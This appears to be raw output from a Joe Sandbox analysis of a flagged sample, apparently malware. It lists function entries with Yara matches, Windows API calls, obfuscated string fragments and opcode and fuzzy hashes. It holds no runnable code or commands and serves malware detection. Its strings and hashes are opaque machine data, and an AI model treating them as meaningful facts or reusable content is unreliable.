                                                                                                • String ID: !$*W.Y$+K!M$;[0]$>C7E$FOEH$NO$U'g)$UGBY$bweM$g#X%$l+X-$w?n!${7y9$$&$EG
                                                                                                • API String ID: 0-3492884535
                                                                                                • Opcode ID: 5e16a26193487a4bdaa5a93cbbb181080dd0d43d457804532e7adee19b2f1ec1
                                                                                                • Instruction ID: ba39798a3fcb6da663dd5afd8d89a9a5fc3f4f782173f0556435d4ff5b4d5338
                                                                                                • Opcode Fuzzy Hash: 5e16a26193487a4bdaa5a93cbbb181080dd0d43d457804532e7adee19b2f1ec1
                                                                                                • Instruction Fuzzy Hash: A3E10EB4608350CFD7249F25E85176FBBF2FB86304F45896DE5D88B252D7388906CB4A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_400000_C7B4.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: /G$I$7N1@$A[$Fg)i$OU$WE${\}
                                                                                                • API String ID: 0-1763234448
                                                                                                • Opcode ID: 99fe5afda1dcc440005955b3418fa216d89817fb1a5d97e426eeaa65bb2ccc37
                                                                                                • Instruction ID: 056ee81575811c50f3dd50ebd9ce003cf240713406730f881528123b83eb6744
                                                                                                • Opcode Fuzzy Hash: 99fe5afda1dcc440005955b3418fa216d89817fb1a5d97e426eeaa65bb2ccc37
                                                                                                • Instruction Fuzzy Hash: 2AF1CAB56083509FD3108F65E88276BBBF2FBD2345F54892DF0858B390D7B88906CB86
                                                                                                APIs
                                                                                                  • Part of subcall function 0043C1F0: LdrInitializeThunk.NTDLL(0043E31B,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043C21E
                                                                                                • FreeLibrary.KERNEL32(?), ref: 0041A6BD
                                                                                                • FreeLibrary.KERNEL32(?), ref: 0041A77B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_400000_C7B4.jbxd
                                                                                                Similarity
                                                                                                • API ID: FreeLibrary$InitializeThunk
                                                                                                • String ID: / $/,-$Wu$46
                                                                                                • API String ID: 764372645-3330591033
                                                                                                • Opcode ID: cfab914b501d8a8cf1708b7d993028f7dd60ead683b03e6467ea9e1f6c8d91ba
                                                                                                • Instruction ID: fba97bcbe2fd55ed4e85c885b06b17ae8f82464d9f69d288493d133838553020
                                                                                                • Opcode Fuzzy Hash: cfab914b501d8a8cf1708b7d993028f7dd60ead683b03e6467ea9e1f6c8d91ba
                                                                                                • Instruction Fuzzy Hash: 9EB247766493009FE3208BA5D8847ABBBD2EBC5310F18D42EE9D497311D7789C858B9B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_400000_C7B4.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 0u4w$KT$Q$SV$_q$p8`;$qr$xy
                                                                                                • API String ID: 0-1826372655
                                                                                                • Opcode ID: de28215cb72b44d1e1dae71e7b93e978bf7f5bc1ac385d0b989c0c45dd6a48be
                                                                                                • Instruction ID: 8fe2ea29b4499c84cffcf606e05d59b8c59937f8b413fb95e2f4cb334fca5623
                                                                                                • Opcode Fuzzy Hash: de28215cb72b44d1e1dae71e7b93e978bf7f5bc1ac385d0b989c0c45dd6a48be
                                                                                                • Instruction Fuzzy Hash: C92212B690C3109BD304DF59D8816ABB7E2EFD5314F09892DE8C98B351E739C905CB8A
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1818190463.0000000000970000.00000040.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_970000_C7B4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FreeLibrary
                                                                                                • String ID: / $/,-$46
                                                                                                • API String ID: 3664257935-479303636
                                                                                                • Opcode ID: 372519780fc120e8f753ff3a14c90593fc4e495d40ae975e42710550ded1acc0
                                                                                                • Instruction ID: d1d035f23ce5ae8347dc15b1d213c47a5197b8e68bd1b05afd337ca0ca571b50
                                                                                                • Opcode Fuzzy Hash: 372519780fc120e8f753ff3a14c90593fc4e495d40ae975e42710550ded1acc0
                                                                                                • Instruction Fuzzy Hash: 2CB255766483409FE320ABA5C884B6FBBE2ABD5300F1CC82EE5D49B351D7759C458B93
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_400000_C7B4.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ($jqci$wkw6$x|j~$ye{|$z/6q$|$Nb
                                                                                                • API String ID: 0-2309992716
                                                                                                • Opcode ID: fd7fa187f6c051c069b61ec8393945a68ebd5901bcbcecc092057dec6910dd98
                                                                                                • Instruction ID: 26eceaee55227743b306782b87e7b3b011f3ad886b5b359efa5fd428808e0ec2
                                                                                                • Opcode Fuzzy Hash: fd7fa187f6c051c069b61ec8393945a68ebd5901bcbcecc092057dec6910dd98
                                                                                                • Instruction Fuzzy Hash: F661F37164D3C68AD3118F3988A076BFFE09FA3310F18497EE4D05B382D7798A09975A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1818190463.0000000000970000.00000040.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_970000_C7B4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ($jqci$wkw6$x|j~$ye{|$z/6q$|$Nb
                                                                                                • API String ID: 0-2309992716
                                                                                                • Opcode ID: fd7fa187f6c051c069b61ec8393945a68ebd5901bcbcecc092057dec6910dd98
                                                                                                • Instruction ID: 2ab32e716e6b5310e30004f6627128c004544e4c9c8f3d4aae615c7544601205
                                                                                                • Opcode Fuzzy Hash: fd7fa187f6c051c069b61ec8393945a68ebd5901bcbcecc092057dec6910dd98
                                                                                                • Instruction Fuzzy Hash: 7461266264C3C68AD3119F3988A076AFFE4DFA3310F18896DE4D54B392D369CA09D716
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1818190463.0000000000970000.00000040.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_970000_C7B4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: #4<7$+8=>$PK$Tiec$\$r
                                                                                                • API String ID: 0-1906979145
                                                                                                • Opcode ID: eb9bb64c8f79c1854ab48af47ab7cc54b735788ac4fdc3cb149e9e4095002922
                                                                                                • Instruction ID: 0d21d0b2e94fcf1cee7bd5a012ec3c1cf3442b66815ac222ff72083cef29fe7d
                                                                                                • Opcode Fuzzy Hash: eb9bb64c8f79c1854ab48af47ab7cc54b735788ac4fdc3cb149e9e4095002922
                                                                                                • Instruction Fuzzy Hash: 85D12576A0C3408BD718CF25C89166BBBE6EFD1318F18892DE4EA9B351D738C905CB46
                                                                                                APIs
                                                                                                • GetCurrentProcessId.KERNEL32 ref: 00978B83
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00978B8C
                                                                                                • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00978C42
                                                                                                • GetForegroundWindow.USER32 ref: 00978C9A
                                                                                                  • Part of subcall function 0097C7B7: CoInitializeEx.COMBASE(00000000,00000002), ref: 0097C7CA
                                                                                                  • Part of subcall function 0097B5F7: FreeLibrary.KERNEL32(00978D1F), ref: 0097B5FD
                                                                                                  • Part of subcall function 0097B5F7: FreeLibrary.KERNEL32 ref: 0097B61E
                                                                                                • ExitProcess.KERNEL32 ref: 00978D38
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1818190463.0000000000970000.00000040.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_970000_C7B4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CurrentFreeLibraryProcess$ExitFolderForegroundInitializePathSpecialThreadWindow
                                                                                                • String ID:
                                                                                                • API String ID: 3072701918-0
                                                                                                • Opcode ID: a98a3e3c2a5f1b0f673359f816fa1806a79807cb3814a0bc3f2413038ab882b7
                                                                                                • Instruction ID: 8211e22c8e5a009f42fef04c62f87f8ea2060f2e8cab9fcaf49f71196b9e2aa3
                                                                                                • Opcode Fuzzy Hash: a98a3e3c2a5f1b0f673359f816fa1806a79807cb3814a0bc3f2413038ab882b7
                                                                                                • Instruction Fuzzy Hash: 255196B7F502180BD72CAEA9CC4A7AA75878BC5710F1EC13D5948DB7D2EEB8880182C5
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_400000_C7B4.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: "$-+$/$hI
                                                                                                • API String ID: 0-2772680581
                                                                                                • Opcode ID: 409baa93764c372ff58d36d41dba2cd8c3d99c0b7ed760c369768b2520c3b364
                                                                                                • Instruction ID: 80b5f3405da4d7e7bc2228bbbe7299cc3933a4313a4431d55bf3dd64750ae482
                                                                                                • Opcode Fuzzy Hash: 409baa93764c372ff58d36d41dba2cd8c3d99c0b7ed760c369768b2520c3b364
                                                                                                • Instruction Fuzzy Hash: 6442387850C3818FC725CF25C8506AFBBE1AF85314F044A6EE8D85B392D739D94ACB5A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1818190463.0000000000970000.00000040.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_970000_C7B4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: "$-+$/$hI
                                                                                                • API String ID: 0-2772680581
                                                                                                • Opcode ID: baaf34aebe6e111159d882b3926c0eef9b01d4c2baae1dbce7045adb7806651d
                                                                                                • Instruction ID: ce37c52a56d25652acd061640e7c51263ec1ef35c7e282e77f2f56a790711500
                                                                                                • Opcode Fuzzy Hash: baaf34aebe6e111159d882b3926c0eef9b01d4c2baae1dbce7045adb7806651d
                                                                                                • Instruction Fuzzy Hash: A542287550C3818FC721EF24C850A6EBBE1AF92314F188A6CE8E99B392D735D905CB56
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1818190463.0000000000970000.00000040.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_970000_C7B4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 0u4w$_q$qr$xy
                                                                                                • API String ID: 0-1225007230
                                                                                                • Opcode ID: 0bc8e236467d41b4c844bc6f0c0f01b646d1471f34f8a440b90695bf15ccba6a
                                                                                                • Instruction ID: ac7f2ff427ecac32fbb3f245bd637df81d2b7a613ddab081dade9cf557044c4f
                                                                                                • Opcode Fuzzy Hash: 0bc8e236467d41b4c844bc6f0c0f01b646d1471f34f8a440b90695bf15ccba6a
                                                                                                • Instruction Fuzzy Hash: DF9101B1A093118BC714DF68C89276BB3F1EF95324F18992DE8CA8B3D1E3789905C756
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_400000_C7B4.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ,JHj$Hs$bc$v
                                                                                                • API String ID: 0-909542228
                                                                                                • Opcode ID: ad4b43c67400b0ccafcca15083408b2c8a4fed5129e88a914fecac855cc6ed9e
                                                                                                • Instruction ID: f210d87f6d5865ed1c617f00c3be5d3d578c02e4f21426ae5baa12ce733d6edf
                                                                                                • Opcode Fuzzy Hash: ad4b43c67400b0ccafcca15083408b2c8a4fed5129e88a914fecac855cc6ed9e
                                                                                                • Instruction Fuzzy Hash: C0919E71A1C3A08BE3358F3594517AFBBD2AFD3314F58896EC4C99B382C6794405CB96
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1818190463.0000000000970000.00000040.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_970000_C7B4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ,JHj$Hs$bc$v
                                                                                                • API String ID: 0-909542228
                                                                                                • Opcode ID: ad4b43c67400b0ccafcca15083408b2c8a4fed5129e88a914fecac855cc6ed9e
                                                                                                • Instruction ID: a87d6eb48a45fe8ff52235d781fbb03449574e7da1fee1581c09023d4d2b12a0
                                                                                                • Opcode Fuzzy Hash: ad4b43c67400b0ccafcca15083408b2c8a4fed5129e88a914fecac855cc6ed9e
                                                                                                • Instruction Fuzzy Hash: 9A916B71A0C3D08BE735CB3988517ABBBD29FE3314F18896DD4DA9B382C6754805CB92
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_400000_C7B4.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ,JHj$Hs$bc$v
                                                                                                • API String ID: 0-909542228
                                                                                                • Opcode ID: f1c18572ebcde3c507da4d01c59951efa700b1a2472cb7546e8eacdba262d522
                                                                                                • Instruction ID: ba8baf3debfb1281f5f3a9f4bb7f36b3e217b7d4f704efc08a24ef2861aa601e
                                                                                                • Opcode Fuzzy Hash: f1c18572ebcde3c507da4d01c59951efa700b1a2472cb7546e8eacdba262d522
                                                                                                • Instruction Fuzzy Hash: FA916D71A1C3A08BE3358F3594917AFBBD2AFD3314F58896DC4C94B382CA794405CB96
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1818190463.0000000000970000.00000040.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_970000_C7B4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ,JHj$Hs$bc$v
                                                                                                • API String ID: 0-909542228
                                                                                                • Opcode ID: f1c18572ebcde3c507da4d01c59951efa700b1a2472cb7546e8eacdba262d522
                                                                                                • Instruction ID: fcb678daa88079722f9cd9083510964400edce40825e836e143d158f8e8fab84
                                                                                                • Opcode Fuzzy Hash: f1c18572ebcde3c507da4d01c59951efa700b1a2472cb7546e8eacdba262d522
                                                                                                • Instruction Fuzzy Hash: 01916F71A0C3D08BE735CB3988517ABBBD29FE3314F18896DD4DA9B782C6754805CB52
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_400000_C7B4.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ,JHj$Hs$bc$v
                                                                                                • API String ID: 0-909542228
                                                                                                • Opcode ID: d2c01644c1b783dc07337eb5961086e4655b708d6c2de64b3f2482e035b941c1
                                                                                                • Instruction ID: f1dd0e060a49988aa5914a4bcfde423beaa814ce8563699fb3410ac54fff71cf
                                                                                                • Opcode Fuzzy Hash: d2c01644c1b783dc07337eb5961086e4655b708d6c2de64b3f2482e035b941c1
                                                                                                • Instruction Fuzzy Hash: 89918E71A1C3A08BE3358F3594517ABBFD2AFD3314F58896EC4C99B382C6794405CB96
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1818190463.0000000000970000.00000040.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_970000_C7B4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ,JHj$Hs$bc$v
                                                                                                • API String ID: 0-909542228
                                                                                                • Opcode ID: d2c01644c1b783dc07337eb5961086e4655b708d6c2de64b3f2482e035b941c1
                                                                                                • Instruction ID: 9bec9a24fa577bca9137a6161189835940462fb15157197b57d6de2fb20c2757
                                                                                                • Opcode Fuzzy Hash: d2c01644c1b783dc07337eb5961086e4655b708d6c2de64b3f2482e035b941c1
                                                                                                • Instruction Fuzzy Hash: 2F915C71A083D08BE7348B3988517ABBBD29FE3314F18896DD4D99B782C6754805CB52
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_400000_C7B4.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ,JHj$Hs$bc$v
                                                                                                • API String ID: 0-909542228
                                                                                                • Opcode ID: 3d500b1000b7ad2bbd92419dc8dce251e5a9dd8a0e3fad46196f1295967bd69e
                                                                                                • Instruction ID: 1e9c0ee7827ae846e03c62aab54aec301621c39cdfcdcbd3b33c3bf2ddd67d6a
                                                                                                • Opcode Fuzzy Hash: 3d500b1000b7ad2bbd92419dc8dce251e5a9dd8a0e3fad46196f1295967bd69e
                                                                                                • Instruction Fuzzy Hash: 4B814871A1C3A08BE3358F3994517ABBFD2AFE3314F59896DC4C94B386C6784409CB96
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1818190463.0000000000970000.00000040.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_970000_C7B4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ,JHj$Hs$bc$v
                                                                                                • API String ID: 0-909542228
                                                                                                • Opcode ID: 3d500b1000b7ad2bbd92419dc8dce251e5a9dd8a0e3fad46196f1295967bd69e
                                                                                                • Instruction ID: 74f39ccc9f0b8ad1d8a44f84057773be362581d8ed0ccb0e90f5caf6be599772
                                                                                                • Opcode Fuzzy Hash: 3d500b1000b7ad2bbd92419dc8dce251e5a9dd8a0e3fad46196f1295967bd69e
                                                                                                • Instruction Fuzzy Hash: 8B8148719083D08BE734CF3988617ABBBD2AFE3304F18895DD4C95B686C6754809CB92
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1818190463.0000000000970000.00000040.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_970000_C7B4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: /G$I$7N1@$Fg)i${\}
                                                                                                • API String ID: 0-149357369
                                                                                                • Opcode ID: f8d948a9f8c2ec87f02193c7bcc93b1dfc54c6f05a1ef69b06e5b5d54ec4d898
                                                                                                • Instruction ID: 65fc904a4671098d00ec35acdf5b85b1509ba10d4e37e8e2f97b4971ac360a40
                                                                                                • Opcode Fuzzy Hash: f8d948a9f8c2ec87f02193c7bcc93b1dfc54c6f05a1ef69b06e5b5d54ec4d898
                                                                                                • Instruction Fuzzy Hash: 342188B551D3809BC314CF66984161BFBE2BBD2704F29A92DF0C85B255D7748902CF8B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_400000_C7B4.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID: ,$i$r}A
                                                                                                • API String ID: 2994545307-2114006112
                                                                                                • Opcode ID: 0e4b36d0337e01a9c7c8ce5630e9dd0ade0f1867cda4b4963c273f19514711e6
                                                                                                • Instruction ID: 71abf614919c99122684cd8b50d12f0618c33dd175a6392faed4f31dbac36a6d
                                                                                                • Opcode Fuzzy Hash: 0e4b36d0337e01a9c7c8ce5630e9dd0ade0f1867cda4b4963c273f19514711e6
                                                                                                • Instruction Fuzzy Hash: 90427976A087508FD324CF69D8807ABBBE2EB96300F1D492ED4D5A7352C7389845C796
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_400000_C7B4.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: gfff$i$r}A
                                                                                                • API String ID: 0-3931832132
                                                                                                • Opcode ID: 63d4f06d283b13aa9aabc31ef275959d287b6dadcbde27f9351af1790c00577d
                                                                                                • Instruction ID: 86030a502c6fbeff1aeb5632b982c99bae1c365f88ce42af9c09e5b1275022bd
                                                                                                • Opcode Fuzzy Hash: 63d4f06d283b13aa9aabc31ef275959d287b6dadcbde27f9351af1790c00577d
                                                                                                • Instruction Fuzzy Hash: 74028A76A483118BD724CF28D8817ABBBE2EBD2300F19852ED4C5D7392DB389945C786
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_400000_C7B4.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 34$C]$|F
                                                                                                • API String ID: 0-2804560523
                                                                                                • Opcode ID: 7bec5bc3369f6adcf9dfe2aa521af371a2ac693f70b7f14cbe9fa8a8d0a997b9
                                                                                                • Instruction ID: 2c432fa7c5999ab476cb5019d0599193357fe59285c965ab9162d9f100ef16a5
                                                                                                • Opcode Fuzzy Hash: 7bec5bc3369f6adcf9dfe2aa521af371a2ac693f70b7f14cbe9fa8a8d0a997b9
                                                                                                • Instruction Fuzzy Hash: E2C1F1B59183118BC720CF28C8816ABB3F2FFD5314F58895DE8D58B390E778A945C79A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1818190463.0000000000970000.00000040.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_970000_C7B4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 34$C]$|F
                                                                                                • API String ID: 0-2804560523
                                                                                                • Opcode ID: 1eada1f2f144597b9c88acb577afbeb3828b2161becaae570a9f1b2935c392b3
                                                                                                • Instruction ID: cbec7ca5f543176144615905cdc90eaf51481ec3a57f723a37a2cd029921c121
                                                                                                • Opcode Fuzzy Hash: 1eada1f2f144597b9c88acb577afbeb3828b2161becaae570a9f1b2935c392b3
                                                                                                • Instruction Fuzzy Hash: 4AC130B69093518BC720DF28C88166BB3F6FFD5314F18895CE8D58B390E7799905CB92
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_400000_C7B4.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Ef$TQ][$sWK)
                                                                                                • API String ID: 0-3401374238
                                                                                                • Opcode ID: 2018eb1ddcc6c4d2b6b82b9d22d54321858e2bd23606dd915e7f156b5046d053
                                                                                                • Instruction ID: 19a0c778187f2748ae17dd07c5e08606c1358576a23e797e2c0b4f31c76305c1
                                                                                                • Opcode Fuzzy Hash: 2018eb1ddcc6c4d2b6b82b9d22d54321858e2bd23606dd915e7f156b5046d053
                                                                                                • Instruction Fuzzy Hash: CBB1C33061C3E08ED7398F2994507ABBBE09F97304F48499DD4D95B382DB79850ACBA7
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1818190463.0000000000970000.00000040.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_970000_C7B4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Ef$TQ][$sWK)
                                                                                                • API String ID: 0-3401374238
                                                                                                • Opcode ID: 34b98bce0e098604bc8c30d8401df6549c9b0a7e4ea807236a6bc4bf95e6afdf
                                                                                                • Instruction ID: 8b169a8c463f5ce37b8d51ad3cdb388673cab900b0a36fe90e5501ea90993162
                                                                                                • Opcode Fuzzy Hash: 34b98bce0e098604bc8c30d8401df6549c9b0a7e4ea807236a6bc4bf95e6afdf
                                                                                                • Instruction Fuzzy Hash: 9DB1D23051D3D08EDB39CF2994907ABBBE49FA7304F08499DD4D95B282DB75850ACB63
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_400000_C7B4.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: +|-~$/pqr$_
                                                                                                • API String ID: 0-1379640984
                                                                                                • Opcode ID: 4a5a7f83b503959aed81fc9274c5a394571bb0f6731898145231dc30ce1a0eba
                                                                                                • Instruction ID: 042a524babaaaf1240c13a88dd3a117b8cd22f0ed9ec4b151ea40a3d869026f8
                                                                                                • Opcode Fuzzy Hash: 4a5a7f83b503959aed81fc9274c5a394571bb0f6731898145231dc30ce1a0eba
                                                                                                • Instruction Fuzzy Hash: D9810A5561495006DB2CDF3489A333BAAD79F84308B2991BFC995CFBABE93CC502874D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1818190463.0000000000970000.00000040.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_970000_C7B4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: +|-~$/pqr$_
                                                                                                • API String ID: 0-1379640984
                                                                                                • Opcode ID: 6cec998220da979fd4d7e4802d464de526f10a737984141f1598214dad803a78
                                                                                                • Instruction ID: 779a7afb232bfc783f4767d4543801ce52a75909cdd0cb68e3d81e54e2db399a
